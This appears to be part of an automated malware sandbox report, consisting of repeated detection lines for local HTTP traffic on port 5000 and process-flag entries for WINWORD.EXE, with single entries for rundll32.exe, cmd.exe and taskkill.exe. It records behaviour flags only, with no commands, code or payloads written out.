Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49308
Source: unknown	Network traffic detected: HTTP traffic on port 49309 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49309
Source: unknown	Network traffic detected: HTTP traffic on port 49310 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknown	Network traffic detected: HTTP traffic on port 49311 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49311
Source: unknown	Network traffic detected: HTTP traffic on port 49312 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49312
Source: unknown	Network traffic detected: HTTP traffic on port 49313 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49313
Source: unknown	Network traffic detected: HTTP traffic on port 49314 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49314
Source: unknown	Network traffic detected: HTTP traffic on port 49315 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49315
Source: unknown	Network traffic detected: HTTP traffic on port 49316 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49316
Source: unknown	Network traffic detected: HTTP traffic on port 49317 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49317
Source: unknown	Network traffic detected: HTTP traffic on port 49318 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49318
Source: unknown	Network traffic detected: HTTP traffic on port 49319 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49319
Source: unknown	Network traffic detected: HTTP traffic on port 49320 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49320
Source: unknown	Network traffic detected: HTTP traffic on port 49321 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49321
Source: unknown	Network traffic detected: HTTP traffic on port 49322 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49322
Source: unknown	Network traffic detected: HTTP traffic on port 49323 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49323
Source: unknown	Network traffic detected: HTTP traffic on port 49324 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49324
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49327 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49327
Source: unknown	Network traffic detected: HTTP traffic on port 49328 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49328
Source: unknown	Network traffic detected: HTTP traffic on port 49329 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49329
Source: unknown	Network traffic detected: HTTP traffic on port 49330 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49330
Source: unknown	Network traffic detected: HTTP traffic on port 49331 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49331
Source: unknown	Network traffic detected: HTTP traffic on port 49332 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49332
Source: unknown	Network traffic detected: HTTP traffic on port 49333 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49333
Source: unknown	Network traffic detected: HTTP traffic on port 49334 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49334
Source: unknown	Network traffic detected: HTTP traffic on port 49335 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49335
Source: unknown	Network traffic detected: HTTP traffic on port 49336 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49336
Source: unknown	Network traffic detected: HTTP traffic on port 49337 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49337
Source: unknown	Network traffic detected: HTTP traffic on port 49338 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49338

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
